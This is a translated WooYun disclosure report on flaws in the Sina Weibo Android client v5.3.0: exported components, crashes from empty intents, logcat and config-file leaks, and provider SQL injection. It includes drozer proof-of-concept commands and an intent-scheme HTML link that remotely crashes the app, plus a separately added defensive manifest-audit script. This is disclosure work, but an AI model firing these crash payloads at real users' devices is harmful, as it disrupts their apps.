
Vulnerability summary

Defect ID: wooyun-2015-0120198

Title: Sina Weibo Android client vulnerability bundle (design flaw / denial of service / sensitive information disclosure / SQL injection)

Vendor: Sina (新浪)

Author: 路人甲

Submitted: 2015-06-15 11:29

Fixed: 2015-09-15 17:22

Published: 2015-09-15 17:22

Vulnerability type: leak of sensitive user data

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-06-15: Details sent to the vendor, awaiting vendor handling
2015-06-17: Vendor confirmed; details disclosed to the vendor only
2015-06-20: Details opened to third-party security partners
2015-08-11: Details opened to core white hats and domain experts
2015-08-21: Details opened to regular white hats
2015-08-31: Details opened to intern white hats
2015-09-15: Details opened to the public

Brief description:

I'm speechless. Please give this one a 打雷 (thunder strike).

Detailed description:

### Client information, latest version: v5.3.0

[Screenshot 0.JPG]


### Design flaw: a large number of exported components enlarges the attack surface. Do that many components really all need exported=true?

dz> run app.package.attacksurface com.sina.weibo
Attack Surface:
103 activities exported
15 broadcast receivers exported
1 content providers exported
14 services exported
dz>


Activity:

dz> run app.activity.info -a com.sina.weibo
Package: com.sina.weibo
com.sina.weibo.MainTabActivity
com.sina.weibo.composerinde.ComposerDispatchActivity
com.sina.weibo.photoalbum.PhotoAlbumActivity
com.sina.weibo.SwitchUser
com.tencent.tauth.AuthActivity
com.sina.weibo.FbBindActivity
com.sina.weibo.UserLoginOverseaActivity
com.sina.weibo.MessageGroupManageActivity
com.sina.weibo.MessageAtMeActivity
com.sina.weibo.MessageCommentActivity
com.sina.weibo.weiyou.DMMessageBoxActivity
com.sina.weibo.weiyouinterface.DMMessageBoxPreLoadingActivity
com.sina.weibo.weiyouinterface.WeiyouDispatchActivity
com.sina.weibo.HomeListActivity
com.sina.weibo.page.SearchResultActivity
com.sina.weibo.WeiboCommonListActivity
com.sina.weibo.FavoriteActivity
com.sina.weibo.page.ProfileInfoActivity
com.sina.weibo.page.UserInfoDetailActivity
com.sina.weibo.page.UserWeiboAttentionFansList
com.sina.weibo.ImageViewer
com.sina.weibo.exlibs.WeiboProcessBrowserPreLoading
com.sina.weibo.exlibs.WeiboBrowserPreLoading
com.sina.weibo.PayCommonForwardActivity
com.sina.weibo.PayOrderInfoLoderActivity
com.sina.weibo.PayOrderActivity
com.sina.weibo.PayBankcardManageActivity
com.sina.weibo.PayFinishedAcitivity
com.sina.weibo.DetailWeiboActivity
com.sina.weibo.LoadingActivity
com.sina.weibo.LocalSearch
com.sina.weibo.SplashActivity
com.sina.weibo.EditorDialogActivity
com.sina.weibo.NavigateViewPageActivity
com.sina.weibo.NearByPeopleNavigator
com.sina.weibo.SSOActivity
com.sina.weibo.SSOAccountListActivity
com.sina.weibo.ChooseContactsActivity
com.sina.weibo.page.EditGroupActivity
com.sina.weibo.GetFriendActivity
com.sina.weibo.NearByActivity
com.sina.weibo.page.ShakeActivity
com.sina.weibo.page.EditChannelActivity
com.sina.weibo.page.FragmentPageActivity
com.sina.weibo.page.ChannelDetailInfoActivity
com.sina.weibo.sync.activity.ContactsSyncActivity
com.sina.weibo.QRCodeActivity
com.sina.weibo.DraftBox
com.sina.weibo.page.CardLikeListActivity
com.sina.weibo.page.CardMblogListActivity
com.sina.weibo.page.CardProductListActivity
com.sina.weibo.page.CardPicListActivity
com.sina.weibo.page.CardInfoListActivity
com.sina.weibo.page.CardUserListActivity
com.sina.weibo.MyThemeActivity
com.sina.weibo.MyWeiboTailActivity
com.sina.weibo.LuckyBagActivity
com.sina.weibo.InstallActionActivity
com.sina.weibo.NewRegistHomeActivity
com.sina.weibo.NewFillInfoActivity
com.sina.weibo.NewInterestPeopleActivity
com.sina.weibo.qrcode.CaptureActivity
com.sina.weibo.PageActivity
com.sina.weibo.page.PageDetailActivity
com.sina.weibo.PageDiscussActivity
com.sina.weibo.page.CardListActivity
com.sina.weibo.page.AlipayCardListActivity
com.sina.weibo.GroupFriendGuideActivity
com.sina.weibo.appmarketinterface.AppMarketActivityDispatcher
com.sina.weibo.appmarket.activity.AppInfoActivity
com.sina.weibo.appmarket.sng.activity.SngMainActivity
com.sina.weibo.appmarket.sng.activity.SngGameDetailActivity
com.sina.weibo.appmarket.sng.activity.SngGameManagerActivity
com.sina.weibo.appmarket.sng.activity.SngMessageListActivity
com.sina.weibo.appmarket.sng.activity.SngMessageDetailActivity
com.sina.weibo.appmarket.sng.activity.SngGiftBagListActivity
com.sina.weibo.appmarket.sng.activity.SngGameGiftBagListActivity
com.sina.weibo.appmarket.sng.activity.SngGiftBagDetailActivity
com.sina.weibo.appmarket.sng.activity.SngGameCategoryActivity
com.sina.weibo.appmarket.sng.activity.SngGameWebViewActivity
com.sina.weibo.appmarket.sng.activity.SngHtml5GameContainerActivity
com.sina.weibo.appmarket.sng.activity.SngEgretGameActivity
com.taobao.tae.sdk.alipaypro.AuthCallbackActivity
com.taobao.tae.sdk.alipaypro.AuthCallbackActivityBrowser
com.sina.weibo.FriendCircleMembersAddActivity
com.sina.weibo.FriendRecommendActivity
com.sina.weibo.media.player.MusicPlayerActivity
com.sina.weibo.page.MyFollowersActivity
com.sina.weibo.page.MyGroupFollowActivity
com.sina.weibo.GroupChatFansGroupActivity
com.sina.weibo.ChristmasEggActivity
com.sina.weibo.BrowserShareActivity
com.sina.weibo.wbc.CameraActivity
com.sina.weibo.GroupChatChooseActivity
com.sina.weibo.GroupChatForwardActivity
com.sina.weibo.GroupListActivity
com.sina.weibo.RadarActivity
com.sina.weibo.radar.RadarMainActivity
com.sina.weibo.radar.RadarTVActivity
com.sina.weibo.hc.HealthHomeActivity
com.sina.weibo.hc.HealthRankListActivity
com.sina.weibo.hc.tracking.ShareTrackActivity
com.sina.weibo.hc.HealthPermissionChoiceActivity


Broadcast:

dz> run app.broadcast.info -a com.sina.weibo
Package: com.sina.weibo
Receiver: com.sina.weibo.bundlemanager.WBExportedBroadcastDeliver
Receiver: com.sina.weibo.gowidget.GoWidgetProvider
Receiver: com.sina.weibo.BootCompletedReceiver
Receiver: com.alipay.mobile.command.trigger.NotifyTrigger
Receiver: com.sina.weibo.push.SDKMsgReceiver
Receiver: com.sina.push.receiver.ProxyReceiver
Receiver: com.sina.weibo.push.PackageReceiver
Receiver: com.sina.push.receiver.PushSDKReceiver
Receiver: com.sina.weibo.sdk.internal.SdkRegisterReceiver
Receiver: com.sina.weibo.wlan.WifiBusinessReceiver
Receiver: com.sina.weibo.push.PushNotificationReceiver
Receiver: com.sina.weibo.localpush.LocalPushReceiver
Receiver: com.sina.weibo.SwitchStateReceiver
Receiver: com.xiaomi.push.service.receivers.NetworkStatusReceiver
Receiver: com.sina.weibo.push.mi.MIUIMessageReceiver


Service:

dz> run app.service.info -a com.sina.weibo
Package: com.sina.weibo
com.sina.weibo.gowidget.GoWidgetProvider$GoWidgetKeepLiveService
Permission: null
com.sina.weibo.sendqueue.SendQueueService
Permission: null
com.sina.weibo.business.WeiboService
Permission: null
com.sina.weibo.business.DownloadManager
Permission: null
com.sina.weibo.business.ImageUtilService
Permission: null
com.sina.weibo.business.RemoteSSOService
Permission: null
com.sina.weibo.appmarket.service.AppMarketService
Permission: null
com.sina.weibo.push.PushServiceProxy
Permission: null
com.sina.push.service.SinaPushService
Permission: com.sina.permission.SINA_PUSH
com.sina.weibo.sdk.internal.SdkIdentityService
Permission: null
com.sina.weibo.sync.contact.ContactsSyncService
Permission: null
com.sina.weibo.sync.AuthenticationService
Permission: null
com.xiaomi.mipush.sdk.PushMessageHandler
Permission: null
com.sina.weibo.hc.tracking.manager.TrackingService
Permission: null


Provider:

dz> run app.provider.info -a com.sina.weibo
Package: com.sina.weibo
Authority: com.sina.weibo.sdkProvider
Read Permission: null
Write Permission: null
Content Provider: com.sina.weibo.datasource.SinaWeiboSdkProvider
Multiprocess Allowed: False
Grant Uri Permissions: False
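The redesign question this section raises (which exported components actually need to be reachable) can be answered from the decoded manifest rather than from the device. The script below is an added example, not code from the report or from Weibo: it applies the 2015-era manifest default rules (an intent-filter implies exported; providers defaulted to exported below targetSdkVersion 17) to an AndroidManifest.xml and lists the exported components that no permission protects. The sample manifest is constructed and only borrows component names from the report.

```python
# Added example, not code from the WooYun report: audit a decoded AndroidManifest.xml for
# exported components (what drozer's attacksurface module counts) and flag the unprotected ones.
import xml.etree.ElementTree as ET
from collections import Counter

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
COMPONENT_TAGS = ("activity", "receiver", "service", "provider")

def is_exported(elem, target_sdk):
    # Manifest default rules as they applied to a 2015-era app (before API level 31).
    explicit = elem.get(ANDROID_NS + "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if elem.tag == "provider":  # providers defaulted to exported before targetSdk 17
        return target_sdk < 17
    return elem.find("intent-filter") is not None  # any intent-filter implies exported

def audit_manifest(xml_text):
    # One record per exported component: type, fully qualified name, permission-protected?
    root = ET.fromstring(xml_text)
    pkg = root.get("package", "")
    sdk = root.find("uses-sdk")
    target_sdk = int(sdk.get(ANDROID_NS + "targetSdkVersion", 1)) if sdk is not None else 1
    findings = []
    for elem in root.find("application"):
        if elem.tag not in COMPONENT_TAGS or not is_exported(elem, target_sdk):
            continue
        name = elem.get(ANDROID_NS + "name")
        name = pkg + name if name.startswith(".") else name
        protected = any(elem.get(ANDROID_NS + p) for p in ("permission", "readPermission", "writePermission"))
        findings.append({"type": elem.tag, "name": name, "protected": protected})
    return findings

def attack_surface(findings):
    # Per-type counts (drozer's summary) plus the names any app on the device can reach.
    counts = dict(Counter(f["type"] for f in findings))
    return counts, sorted(f["name"] for f in findings if not f["protected"])

# Constructed sample manifest; names borrowed from the report, not Weibo's real manifest.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.sina.weibo"><uses-sdk android:targetSdkVersion="14"/><application>
    <activity android:name=".MainTabActivity"><intent-filter>
      <action android:name="android.intent.action.MAIN"/></intent-filter></activity>
    <activity android:name=".ImageViewer" android:exported="true"/>
    <activity android:name=".DraftBox" android:exported="false"/>
    <service android:name="com.sina.push.service.SinaPushService" android:exported="true"
        android:permission="com.sina.permission.SINA_PUSH"/>
    <provider android:name=".datasource.SinaWeiboSdkProvider"
        android:authorities="com.sina.weibo.sdkProvider"/></application></manifest>"""
```

Run it against the output of apktool (or any other decoder that produces a plain-text manifest); every name it prints should either get android:exported="false" or a permission it can justify.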


#### Sending an empty intent to some of the exposed components crashes the Weibo client
There are too many exported components, so only some of the activities were tried; several problematic components were found (please check the rest yourselves). They are:

com.sina.weibo.weiyou.DMMessageBoxActivity
com.sina.weibo.ImageViewer
com.sina.weibo.exlibs.WeiboProcessBrowserPreLoading
com.sina.weibo.exlibs.WeiboBrowserPreLoading


[Screenshot 2.JPG]


Partial crash logs:

[Screenshot 3.JPG]


[Screenshot 4.JPG]


POC:

dz> run app.activity.start --component com.sina.weibo com.sina.weibo.weiyou.DMMessageBoxActivity
dz> run app.activity.start --component com.sina.weibo com.sina.weibo.ImageViewer
dz> run app.activity.start --component com.sina.weibo com.sina.weibo.exlibs.WeiboProcessBrowserPreLoading
dz> run app.activity.start --component com.sina.weibo com.sina.weibo.exlibs.WeiboBrowserPreLoading


Or remote exploitation via the intent scheme:

<a href="intent:#Intent;component=cn.com.sina.weibo/com.sina.weibo.weiyou.DMMessageBoxActivity;end">触发漏洞</a><br>


#### Logcat debug output leaks sensitive content

[Screenshot 1.JPG]


#### Local configuration files leak sensitive information

[Screenshot 6.JPG]


[Screenshot 7.JPG]


[Screenshot 8.JPG]


#### There is also a local SQL injection

dz> run scanner.provider.injection -a com.sina.weibo
Scanning com.sina.weibo...
Not Vulnerable:
content://com.sina.weibo.picListProvider/query_picinfo
content://mms-sms/conversations/
content://telephony/apgroups/
content://com.lenovo.launcher.badge/lenovo_badges/
content://com.sina.weibo.picListProvider/query_status
content://com.sina.weibo.userlog/pushinitlog/
content://com.sina.weibo.picListProvider/query_size
content://com.sina.weibo.userlog/netlog
content://com.android.contacts/
content://com.huawei.android.launcher.settings/badge/
content://com.sina.weibo.userlog/netlog/
content://com.android.contacts
content://com.sina.weibo.blogProvider/
content://com.sina.weibo.userlog/pushinitlog
content://com.sina.weibo.userlog/
content://com.sina.weibo.userlog
content://com.android.launcher2.settings/favorites?notify=true/
content://com.sina.weibo.blogProvider/home/
content://com.android.launcher2.settings/favorites?notify=true
content://com.sina.weibo.picListProvider/query_picinfo/
content://com.sina.push.pushprovider.1004/
content://com.sina.weibo.sdkProvider
content://com.sina.weibo.picListProvider/query_status/
content://com.lenovo.launcher.badge/lenovo_badges
content://com.sina.weibo.picListProvider/query_size/
content://com.sina.weibo.sdkProvider/
content://telephony/apgroups
content://com.sina.weibo.blogProvider/home
content://com.huawei.android.launcher.settings/badge
content://com.sina.weibo.picListProvider/
content://sms/inbox/
content://downloads/public_downloads/
content://com.sina.weibo.picListProvider
content://mms-sms/conversations
content://com.sina.weibo.spProvider
content://com.android.launcher.settings/favorites?notify=true
content://sms
content://com.sina.weibo.spProvider/
content://downloads/public_downloads
content://com.android.launcher.settings/favorites?notify=true/
content://sms/
content://sms/inbox
content://com.sina.weibo.blogProvider
content://com.sina.push.pushprovider.1004
Injection in Projection:
content://telephony/carriers
content://telephony/carriers/preferapn/
content://telephony/carriers/
content://telephony/carriers/preferapn
Injection in Selection:
content://telephony/carriers
content://telephony/carriers/preferapn/
content://telephony/carriers/
content://telephony/carriers/preferapn


[Screenshot 5.JPG]

Proof of vulnerability:

See the detailed description.

Remediation:

1. That many exported=true components: redesign them.
2. Disable debug output in release builds.
3. Components should handle malformed intents correctly.
4. SQL injection...
...

Copyright notice: when reposting, please credit 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Low

Vulnerability Rank: 5

Confirmed at: 2015-06-17 17:21

Vendor reply:

Thank you for supporting Sina security; the relevant business unit has been notified.

Latest status:

None yet